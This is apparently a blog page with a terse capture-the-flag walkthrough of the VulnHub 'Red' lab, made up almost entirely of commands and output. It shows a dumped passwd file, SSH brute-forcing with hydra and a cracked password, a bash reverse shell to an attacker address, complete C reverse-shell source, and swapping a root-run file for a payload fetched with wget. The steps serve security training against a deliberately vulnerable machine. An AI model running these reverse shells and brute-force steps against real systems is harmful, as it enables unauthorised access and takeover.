root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin john:x:1000:1000:john:/home/john:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false ippsec:x:1001:1001:,,,:/home/ippsec:/bin/bash oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash

$ ./hashcat --stdout ~/test./test.txt -r /usr/share/hashcat/rules/best64.rule > ~/test./passlist.txt

beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)

$ hydra -l john -P ~/test./passlist.txt 192.168.0.104 ssh

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-22 19:25:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://192.168.0.104:22/
[22][ssh] host: 192.168.0.104   login: john   password: R3v_m4lwh3r3_k1nG!!6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-22 19:26:10

john@red:~$ sudo -u ippsec /usr/bin/time /bin/bash

ippsec@red:/home/john$ cd /dev/shm

ippsec@red:/dev/shm$ ls

ippsec@red:/dev/shm$ cat shell.sh

ippsec@red:/dev/shm$ vi shell.sh 

#! /bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.0.103/2333 0>&1'

ippsec@red:/dev/shm$ chmod +x shell.sh

ippsec@red:/dev/shm$ ./shell.sh

$ nc -lnvp 2333

ippsec@red:/home/john$ python3 -c 'import pty;pty.spawn("/bin/bash")'

ippsec@red:/home/john$ export TERM=xterm

ippsec@red:/home/john$ ^Z

$ stty raw -echo;fg

ippsec@red:/dev/shm$ cd /home/john

ippsec@red:/home/john$ ls

note_from_red.txt

ippsec@red:/home/john$ vi note_from_red.txt 

Having a little trouble with the cat command blue?

ippsec@red:/home/john$ You will never see your way to 0xdf

https://www.revshells.com/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 2333;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.103");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}

ippsec@red:cd /var/www/wordpress/.git

ippsec@red:/var/www/wordpress/.git$ rm -r rev 

rm: remove write-protected regular file 'rev'? y

ippsec@red:/var/www/wordpress/.git$ rm -r supersecretfileuc.c 

rm: remove write-protected regular file 'supersecretfileuc.c'? y

ippsec@red:/var/www/wordpress/.git$ wget 192.168.0.103/supersecretfileuc.c

--2022-03-23 02:49:49--  http://192.168.0.106:8000/supersecretfileuc.c
Connecting to 192.168.0.106:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 667 [text/x-csrc]
Saving to: ‘supersecretfileuc.c’

supersecretfileuc.c 100%[===================>]     667  --.-KB/s    in 0s      

2022-03-23 02:49:49 (217 MB/s) - ‘supersecretfileuc.c’ saved [667/667]

$ nc -lnvp 1234

ls

root.txt

vi root.txt

GG Blue, GG
N1etzsche
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub实战:Red
huangyongkang666的博客
05-19 1621
vulnhub实战:Red 1.Red介绍 描述 红色已经接管了你的系统,你能重新获得控制权吗? 下载地址: https://download.vulnhub.com/red/Red.ova 2.安装部署 下载之后使用VMware打开.ova文件,打开结果,设置为Net模式 由于打开后,使用以下命令:无法获取到ip arp-scan -l 这种一般都是网卡配置问题,于是进行查看,在开启靶机时按shift键,出现如下界面 往下找到第一个linux字符串,找到 ro xxxxx,然后改成 rw sing
vulnhub——Red:1靶机
Re1_zf的博客
10-31 1010
然后就不需要手动执行了,这里会生成一个新的rev文件,这个rev文件会驱动supersecretfileuc.c的执行,即它会自动执行,在攻击机上监听对应端口就可以了。这里回到前面搜索ippsec有权限的目录时搜索到的一个用户目录,查看一下另一个没有提到的用户目录,拿到另一个flag。可以将这个文件的内容进行一下替换,替换为反弹shell的脚本,这样就可以弹回root权限的shell了应该。前面探查到了这个网站是wordpress的架构,利用文件包含查看一下它的配置文件,看有没有什么有用的信息。
VulnHub Red进行渗透测试的总结与过程
雨泽网络工作室
11-18 624
VulnHub Red进行渗透测试的总结与过程
Vulnhub_Red:1
qq_45434762的博客
03-13 381
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
VulnHub | Red:1
薛定的餓貓
12-19 2892
Red : 1 目录Red : 1项目地址测试环境测试过程信息收集查找后门文件后门利用hash碰撞会话维持权限提出 项目地址 http://www.vulnhub.com/entry/red-1,753/ 难度:Medium 测试环境 攻击机:Kali 192.168.56.109 目标靶机:Ubuntu 192.168.56.113 测试过程 信息收集 查找靶机IParp-scan -I eth1 -l,获取到目标IP为192.168.56.113。 使用nmap扫描目标开放了哪些端口nmap -sS
flower nodered备份
12-28
自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留-勿拿-flower nodered备份自留...
red语言历史
10-26
Red 是一门新的编程语言,它受到了 REBOL 很大的启发,但由于它有本地代码编译器,Red 的应用领域更加广泛——下到系统编程上到高级脚本,同时提供了对现代的多核 CPU 并发编程的支持。 主要特点为: 函数式、声明...
red5 fitcDemo
09-03
视频监控red5官方的例子,不知道为什么现在在官网没找到下载的地方,我这里保留了一份,可以查看源码学习
red gate 注册机
12-28
破解red gate
red5-server
10-09
red5-server
dplus(D+)-开源
05-09
计算从给定日期到今天经过了多少天
vulnhub靶场,RED: 1
kukudeshuo的博客
02-11 4341
vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.197
Vulnhub靶场实践】 Red:1
守拙的博客
07-19 926
保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。
服务器漏洞渗透测试
m0_46363470的博客
03-27 6641
渗透测试 本教程仅用于学习,出现问题与本人无关 主机发现:使用工具进行IP扫描 namp -sP 环境的IP段(192.168.0.1/24) arp-scan -l 端口扫描 nmap -p 1-65535 -A 目标主机IP [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0dNBWl30-1648358293931)(P3.png)] 发现有22、80两个端口存在服务 先从80端口进行渗透发现是否存在漏洞 [外链图片转存失败,源站可能有防盗链机制,建议将图片保
scrcpy 使用教程:将安卓设备投屏到 PC 端
Xpitz的博客
05-18 3792
文章首发于个人公众号:「阿拉平平」 scrcpy 是一款开源的安卓设备投屏工具,通过 USB 或 Wi-Fi 与设备连接后就可以在 PC 端操作安卓设备,无需 root 权限且支持多平台运行。 本文将演示如何使用 scrcpy 进行投屏操作。 下载安装 到 Releases 下载最新的安装包。目前 scrcpy 最新版本为 v1.13, 我用的是 Windows x64 系统,这里下载对应的包: 解压后可以看到以下文件: Windows 的安装包里已经集成了 adb 工具,接下来就可以连接设备了。其.
0.0.0.0 127.0.0.1 localhost 192.168.1.xxx 区别与联系?
weixin_34114823的博客
05-06 402
(a)0.0.0.0:是一个非常特殊的IP地址,这个IP相当于java中的this,代表当前设备的IP,可以跟着变化,并不指代一个确定的一个。 (b)127.0.0.1:是回送地址,指本地机,一般用来测试使用。回送地址(127.x.x.x)是本机回送地址(Loopback Address),即主机IP堆栈内部的IP地址,主要用于网络软件测试以及本地机进程间通信,无论什么程序,一旦使用回送地址发送...
windows无法访问指定设备_scrcpy 使用教程:将安卓设备投屏到 PC 端
weixin_39636102的博客
11-02 1656
阿拉平平读完需要6分钟速读仅需 2 分钟scrcpy 是一款开源的安卓设备投屏工具,通过 USB 或 Wi-Fi 与设备连接后就可以在 PC 端操作安卓设备,无需 root 权限且支持多平台运行。本文将演示如何使用 scrcpy 进行投屏操作。1. 下载安装 到 Releases 下载最新的安装包。目前 scrcpy 最新版本为 v1.13, 我用的是 Windows x64 系统,...
基于windows server的简单内网渗透
weixin_55541277的博客
06-09 2284
记录简单的基于windows server搭建的内网渗透靶场
陇原战役 Web题目WriteUP WP CTF竞赛
zxsctf的博客
03-11 4685
大家还记得上此次的陇原战役比赛么?今天给大家分享一下上次比赛的Web题目WriteUP!!
eclipse RED
最新发布
09-05
Eclipse RED是基于Eclipse的RobotFramework测试用例编辑器,是robotframework-ride的“升级版”。要安装Eclipse RED,可以按照以下步骤进行操作: 1. 启动Eclipse,点击菜单栏中的Help -> Eclipse Marketplace。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值